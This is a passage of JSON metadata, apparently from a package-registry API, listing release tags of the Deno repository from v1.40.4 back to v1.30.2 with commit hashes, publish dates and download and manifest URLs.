1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/